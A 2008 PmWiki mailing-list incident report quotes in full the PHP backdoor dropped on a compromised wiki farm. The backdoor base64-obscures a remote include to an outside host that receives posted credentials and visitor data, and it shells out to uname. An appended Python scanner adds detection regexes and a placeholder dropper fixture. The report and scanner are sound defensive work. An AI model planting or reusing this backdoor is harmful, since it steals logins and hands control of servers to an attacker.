[pmwiki-users] PmWiki security

kjettil kjettil at wanadoo.fr
Mon May 12 12:00:50 CDT 2008


I just detected that one of my PmWiki sites, previously coming up as no.
1 in Google search results, had completely disappeared from them.
I then discovered that a Google search for the domain (on shared hosting)
on which I have several PmWiki sites (a WikiFarm) returned a lot of
strange-looking results, viz. filenames I couldn't recognize.
Further examination showed that several wiki sites and the home wiki had
been "modified".

Common to all cases is that wiki.d (or, in a couple of cases, another
directory with linked files) had been chmod 777 to allow editing. Sites
that are password-protected against both reading and writing have also
been manipulated.

In these cases, none of the existing files have been modified or
deleted, but an .htaccess file with contents:

Options -MultiViews
ErrorDocument 404 //ahw/wiki.d/CurrentVisitors/tests.php

(or similar, depending on wiki, directory, file name and location)

as well as one or more (in one case dozens of) .php files (with a
variety of names) with varying contents, but all similar to this:

<?php
error_reporting(0);
// Credentials posted as l/p are appended to the callback; base64-encoded when "input" is set
if (isset($_POST["l"]) and isset($_POST["p"])) {
    if (isset($_POST["input"])) {
        $user_auth = "&l=" . base64_encode($_POST["l"]) . "&p=" . base64_encode(md5($_POST["p"]));
    } else {
        $user_auth = "&l=" . $_POST["l"] . "&p=" . $_POST["p"];
    }
} else {
    $user_auth = "";
}
if (!isset($_POST["log_flg"])) {
    $log_flg = "&log";
}
// "aHR0cDovLw==" decodes to "http://" and "LnVzZXJzLmJpc2hlbGwucnU=" to ".users.bishell.ru":
// the file include()s remote PHP, reporting the visitor's IP and the requested URL to that host
if (!@include_once(base64_decode("aHR0cDovLw==") . "hiddzzazbzczdifzb" . base64_decode("LnVzZXJzLmJpc2hlbGwucnU=")
        . "/?r_addr=" . sprintf("%u", ip2long(getenv(REMOTE_ADDR)))
        . "&url=" . base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg)) {
    // Fallback when the remote include fails: confirm the backdoor is alive and leak uname
    if ($_POST["l"] == "special") {
        print "sys_active" . `uname -a`;
    }
}
?>

have been inserted (all at about the same time, a few minutes after
midnight between 29 Feb and 1 Mar in western Asia, in all wikis, so the
attack must have been automated).

Search engines have been fed with heaps of links to rubbish contents and
seem to have concluded that this domain is a spam domain. Luckily,
several other domains/sites I have, also using PmWiki, have not been hit.

I don't know how the intruder technically did this.
My immediate action is to clean the sites from inserted files and chmod
all critical wiki.d directories to 755.
That cleaning is a simple task.
Worse is that my domain may now have been forever blacklisted by
search engines.

/kjettil
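The indicators described in the message above (a world-writable wiki.d, an .htaccess whose ErrorDocument 404 hands control to a dropped .php file, and PHP files that include a base64-decoded remote URL and shell out to uname) are easy to triage across a whole farm with a small scanner. The following is an added example, not code from the original post or from PmWiki. The directory fixture it builds is constructed to mirror the message; the host in its sample dropper decodes to a placeholder (".example.net"), not the address in the real file, and the indicator names and regexes are this example's own choices.

```python
"""Triage for the compromise pattern described above: scan a PmWiki farm for
the indicators the post lists, then re-chmod the world-writable directories."""
import os
import re
import stat
import tempfile
from pathlib import Path

# .htaccess directive that hands every 404 to an attacker-dropped script.
ERRORDOC_RE = re.compile(r"^\s*ErrorDocument\s+404\s+(\S+\.php)\s*$", re.I | re.M)

# Content indicators taken from the dropped file quoted in the post.
PHP_IOCS = {
    "remote_include": re.compile(r"@?include(?:_once)?\s*\(\s*base64_decode\s*\(", re.I),
    "silenced_errors": re.compile(r"error_reporting\s*\(\s*0\s*\)", re.I),
    "shell_exec": re.compile(r"`[^`]*uname[^`]*`"),
}


def world_writable(path: Path) -> bool:
    """True when 'other' may write (the chmod 777 the post found on wiki.d)."""
    return bool(path.stat().st_mode & stat.S_IWOTH)


def scan_tree(root: Path) -> dict:
    """Return {indicator: [relative paths]} for everything under root that matches."""
    findings = {"world_writable_dir": [], "htaccess_404_to_php": [],
                "php_in_wiki_d": [], "php_iocs": []}
    for dirpath, _dirs, filenames in os.walk(root):
        d = Path(dirpath)
        if world_writable(d):
            findings["world_writable_dir"].append(str(d.relative_to(root)))
        for name in filenames:
            f = d / name
            rel = str(f.relative_to(root))
            if name == ".htaccess":
                m = ERRORDOC_RE.search(f.read_text(errors="replace"))
                if m:
                    findings["htaccess_404_to_php"].append(f"{rel} -> {m.group(1)}")
            elif name.lower().endswith(".php"):
                # wiki.d holds PmWiki page files, which carry no extension;
                # any .php in there was put there by someone else.
                if "wiki.d" in f.relative_to(root).parts:
                    findings["php_in_wiki_d"].append(rel)
                text = f.read_text(errors="replace")
                hits = [k for k, rx in PHP_IOCS.items() if rx.search(text)]
                if hits:
                    findings["php_iocs"].append(f"{rel}: {', '.join(hits)}")
    return findings


def fix_permissions(root: Path, mode: int = 0o755) -> list:
    """The post's remediation: chmod every world-writable directory back to 755."""
    fixed = []
    for dirpath, _dirs, _files in os.walk(root):
        d = Path(dirpath)
        if world_writable(d):
            d.chmod(mode)
            fixed.append(str(d.relative_to(root)))
    return fixed


def build_sample_tree(base: Path) -> Path:
    """Constructed fixture: one clean wiki ('clean') and one hit wiki ('ahw'),
    laid out as the message describes. Not real data from the incident."""
    clean = base / "clean" / "wiki.d"
    hit = base / "ahw" / "wiki.d"
    dropper = hit / "CurrentVisitors"
    for d in (clean, hit, dropper):
        d.mkdir(parents=True)
    for d in (base, base / "clean", base / "ahw", clean, hit, dropper):
        d.chmod(0o755)  # explicit, so the fixture does not depend on the umask
    for wd in (clean, hit):
        (wd / "Main.HomePage").write_text("version=pmwiki-2.2.0\ntext=Welcome\n")
    (hit / ".htaccess").write_text(
        "Options -MultiViews\n"
        "ErrorDocument 404 //ahw/wiki.d/CurrentVisitors/tests.php\n")
    # Condensed stand-in for the dropped file; the host decodes to ".example.net",
    # a placeholder rather than the address in the real dropper.
    (dropper / "tests.php").write_text(
        '<?php error_reporting(0);'
        'if(!@include_once(base64_decode("aHR0cDovLw==")."placeholder"'
        '.base64_decode("LmV4YW1wbGUubmV0")."/?u=".$_SERVER["SERVER_NAME"]))'
        '{print "sys_active".`uname -a`;} ?>')
    hit.chmod(0o777)  # the state the post found wiki.d in
    return base


def run_demo() -> dict:
    """Build the fixture in a temp dir, scan, remediate, rescan; return all three."""
    with tempfile.TemporaryDirectory() as tmp:
        root = build_sample_tree(Path(tmp))
        before = scan_tree(root)
        fixed = fix_permissions(root)
        after = scan_tree(root)
    return {"before": before, "fixed": fixed, "after": after}


if __name__ == "__main__":
    result = run_demo()
    for indicator, paths in result["before"].items():
        print(f"{indicator}: {paths}")
    print("re-chmodded:", result["fixed"])
```

Run against a real farm with `scan_tree(Path("/path/to/farm"))`; the scanner only reads, and `fix_permissions` only touches mode bits, so removing the dropped files stays a deliberate manual step after reviewing the `php_in_wiki_d` and `php_iocs` lists. Note that fixing permissions alone closes the write path the post identifies but does not explain how the attacker obtained it, so the `.htaccess` and `.php` findings should be kept as evidence.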